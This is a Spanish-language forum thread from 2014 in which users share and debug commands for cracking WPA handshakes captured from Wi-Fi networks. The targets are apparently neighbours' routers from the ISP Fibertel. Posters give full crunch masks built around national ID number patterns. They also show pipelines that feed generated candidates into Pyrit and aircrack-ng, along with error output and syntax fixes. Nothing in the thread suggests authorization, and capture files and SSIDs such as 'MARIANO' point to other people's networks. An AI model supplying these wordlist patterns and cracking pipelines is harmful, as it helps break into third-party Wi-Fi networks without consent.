[REQ] Script te automitzacion de uso de los diccionarios con Pyrit.

Publicado por MaD_MaX, 28 de Junio de 2014, 10:19:50 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

MaD_MaX

Hola.

Alguien (DEMON) puede hacer un script que automatize el uso de los diccionarios con Pyrit.

Motivo: Para Fibertel tengo 27 dic's. Y estar escribiendo "pyrit -r WiFi877-04.cap -i /root/Dics/# attack_passthrough" cada vez canza. Cada pass lleva entre un par de horas y 6 horas. Termine corriendo 3 procesos en paralelo. Pero sigue siendo incomodo.

Solucion - hacer un script que cambie el nombre del archivo del diccionario.

Hice diccionarios con los numeros concecutivos: 1-27

La solucion seria hacer un loop hasta encontarr el pass.
Algo similar a esto:
You are not allowed to view links. Register or Login
La diferencia que aqui usan la BD. No le veo mucha diferencia. (Hacer la DB, parece que es mas rapido, pero despues debes comparar los PMKs con los de la captura, y se te va el tiempo tambien. No se, capaz es mejor pero no importa por ahora).

Si quiern, pueden tomar la idea de aqui tambien para particionar los diccionarios si son muy grandes (en el caso de usar los DIcs de internet, parece que con los de FB no hace falta)
You are not allowed to view links. Register or Login

Los dics los cree con este comando:
crunch 9 9 -o 1 -t 004%%%%%%  && crunch 9 9 -o 2 -t 014%%%%%%  && crunch 9 9 -o 3 -t 004%%%%%%  && crunch 10 10 -o 4 -t %14%%%%%%%  && crunch 10 10 -o 5 -t 004%%%%%%%  && crunch 10 10 -o 6 -t 005%%%%%%%  && crunch 10 10 -o 7 -t 010%%%%%%%  && crunch 10 10 -o 8 -t 420%%%%%%%  && crunch 10 10 -o 9 -t 131%%%%%%%  && crunch 10 10 -o 10 -t 140%%%%%%%  && crunch 10 10 -o 11 -t 234%%%%%%%  && crunch 10 10 -o 12 -t 265%%%%%%%  && crunch 10 10 -o 13 -t 298%%%%%%%  && crunch 10 10 -o 14 -t 316%%%%%%%  && crunch 11 11 -o 15 -t 014%%%%%%%%   &&  crunch 11 11 -o 16 -t 004%%%%%%%% && crunch 11 11 -o 17 -t %%%%%%%%000 && crunch 13 13 -o 18 -t 004%%%%%%%%00 && crunch 13 13 -o 19 -t 26%%%%%%%%000 && crunch 13 13 -o 20 -t 260%%%%%%%abc && crunch 13 13 -o 21 -t 261%%%%%%%abc && crunch 13 13 -o 22 -t 262%%%%%%%abc && crunch 13 13 -o 23 -t 269%%%%%%%abc && crunch 13 13 -o 24 -t 420%%%%%%%000 && crunch 13 13 -o 25 -t 420%%%%%%%abc && crunch 13 13 -o 26 -t fibertel%%%%% && crunch 14 14 -o 27 -t 420%%%%%%%wifi



PD: usar PYRIT con la base de datos me parecio pedida de tiempo, ya que no tiene sentido pasar a la BD todos los pass y despues tenerlos almacenados ahi para correr el batch hasta encontrar la pass solo una vez. Tb perdida de almacenamiento. Los 60 Gb no me alcanzaron para todos los PMKs para los DIC's para 3 redes.

Tema en el Kali:
You are not allowed to view links. Register or Login

diogenes

muy interesante yo ya lo habia pensado estaria muy bueno poder pasar todos los diccionarios automaticamente!!! yo en mi caso hice los diccionarios por ejemplo:
de 0041000000 a 0041999999
de 0042000000 a 0042999999
de 0043000000 a 0043999999
lo hice en el rango 1000000 a 3999999 porque creo es lo mas factible dado q son dni para ahorrar tiempo aunque creo q los de 420 si puden ser del 0000000 al 9999999.
osea cada diccionario q paso lo dividi en 3 imaginense lo cansador q es pasar uno a uno jaja son muchos diccionarios.
Si se pudiera hacer algo para pasarlos automaticamente relamente seria un exito!!! saludos

MaD_MaX

Diogenes, en este caso no se trata de optimizar los diccionarios, sino automatizar el uso de los dics. Sepero que los grosos se metan.

diogenes

You are not allowed to view links. Register or Login
Diogenes, en este caso no se trata de optimizar los diccionarios, sino automatizar el uso de los dics. Sepero que los grosos se metan.

si ya se pero comentaba q en mi caso al dividirlos asi son muchos mas diccionarios y se hace muy laborioso tener q probarlos uno a uno la verdad seria barbaro q se puedan automatizar!! saludos

diogenes

You are not allowed to view links. Register or Login
Diogenes, en este caso no se trata de optimizar los diccionarios, sino automatizar el uso de los dics. Sepero que los grosos se metan.
hola alguna novedad respecto a la automatizacion de diccionarios? si te enteras de algo avisa q aca hay otro renegando con tantos diccionarios de fiber jaja saludos

MaD_MaX

No, nada.
Espere que D3M0N nos de una mano, pero sigimos esperando por ahora.

D3M0N

Principalmente habría que ver de crear el diccionario de 1.000.000 a 40.000.000 pero sin crear el archivo, así evitamos el juego del espacio en disco, luego probar si pasa dos diccionarios juntos sin generar los archivos utilizando el && corriendo en // el AirCrack-NG. Con eso tendríamos básicamente planteado el script ahora simplemente manos a la obra!

crunch 10 10 0123456789 -t 004@@@@@@@ -s 0041000000 -e 0044500000


-s = Comienzo en... X. (Specifies a starting string, eg: 0041000000)
-e = Termino en... X. (Specifies when crunch should stop early)

Ahora probé con:

crunch 10 10 0123456789 -t 004@@@@@@@ -s 0041000000 -e 0041050000 && crunch 10 10 0123456789 -t 014@@@@@@@ -s 0141000000 -e 0141050000


Para testear y se pasa al otro dic sin problemas, ahora habría que testearlo en AirCrack.-

MaD_MaX

Habia probado de utilizar Crunch con el HashCat y Pyrrit por el STDOUT pero el inconveniente es que 1- no se puede resumir si necesitas pausar/interrumpir el proceso. 2- No sabes que diccionario se esta ciendo usado en dado momento por si (tenes que interrumpir).
Pero esta bien lo que decis, tema que son tantos diccionarios, que en mi maquina no llega a procesarlos en un dia, y capaz la maquina la necesito usar, y cuando esta al 100% del procesamiento (con pyrit llega a 15 mil PMKs), no responde a nada.
Por esta razon preferia el script para automatizar un poco el proceso.

GSN

Habría que ver, yo probé este code:

crunch 10 10 0123456789 -t 004@@@@@@@ -s 0041000000 -e 0041050000 && crunch 10 10 0123456789 -t 014@@@@@@@ -s 0141000000 -e 0141050000


pero cuando llega al final del primero tiene una pausa y sigue con el siguiente, cuestión que no tengo el aircrack para probar si fusiona sin problemas, veo si lo instalo porque estoy por windows, pero estaría bueno un script dedicado para linux con todas las opciones.

D3M0N

Sep, yo estoy corto con los tiempos. Si alguien se prueba lo del aircrack el finde si puedo voy armando el script.

diogenes

buenisimo chicos se pasan!! ahora ya es muy tarde me voy a dormir pero ya lo estare probando a esto q comentan.

saludos

diogenes

hola les comento q probe lanzar ese script directo contra aircrack sin guardar el diccionario en disco duro ¿seria sin la opcion <-o START> verdad?:

crunch 10 10 0123456789 -t 004@@@@@@@ -s 0041000000 -e 0044500000 && crunch 10 10 0123456789 -t 014@@@@@@@ -s 0141000000 -e 0144500000 | aircrack-ng file-*.cap -e (SSID) -w -


pero solo me paso el diccionario 004 ! el diccionario 014 ni rastro...

Cambiando la sintaxis para otro ataque quiero lanzar crunch directo contra aircrack sin guardar en disco duro:
crunch 9 9 0123456789 -t %%%%%%%%% | aircrack-ng /root/Desktop/mariano-02.cap -e MARIANO -w w

y me sale el siguiente error:
Crunch will now generate the following amount of data: 10000000000 bytes
9536 MB
9 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 1000000000
fopen(dictionary) failed: No such file or directory                                                           
fopen(dictionary) failed: No such file or directory                                                           
Opening /root/Desktop/mariano-02.cap                                                                         
Read 14307 packets.
                                                                                                             
Opening /root/Desktop/mariano-02.cap                                                                         
Please specify a dictionary (option -w).                                                                     
                                                                                                             
                                                                                                             
Quitting aircrack-ng...   


alguno tiene idea de x q no me deja?


D3M0N

@diogenes: si es sin usar el -o START. Bien proba si te lo toma usando el | en vez de &&:

crunch 10 10 0123456789 -t 004@@@@@@@ -s 0041000000 -e 0044500000 | crunch 10 10 0123456789 -t 014@@@@@@@ -s 0141000000 -e 0144500000 | aircrack-ng file-*.cap -e (SSID) -w -


si funciona recortaría bastante el Script, de lo contrario tendríamos que crear el archivo, luego levantarlo y pasarlo y es perdida de tiempo, pero si no queda otra...

Por parte de tu otro crack, en AirCrack en el -w w tenes que poner -w - sino va a buscar en el directorio /w/ por eso te da el mensaje: failed: No such file or directory y después te vuelve a mostrar Please specify a dictionary (option -w).

diogenes

solucionado el ultimo error q me daba era por mala sintaxis:

crunch 9 9 0123456789 -t %%%%%%%%% | aircrack-ng /root/Desktop/mariano-02.cap -e MARIANO -w w


el comando correcto finaliza con "-" en vez de la "w" seria el siguiente:

crunch 9 9 0123456789 -t %%%%%%%%% | aircrack-ng /root/Desktop/mariano-02.cap -e MARIANO -w -

MaD_MaX

Hoy pruebo en casa los comandos que pasaron.

Entiendo que agrega dificultad, pero la idea era: Al usar todos los diccionarios, se lleva mucho tiempo, es posible con algun script hacer que cuando queras cortar la ejecucion y en otro momento reanudar desde donde se corto?

Mucho pedir pero bue, anda saber capaz es una pabada. Gracias.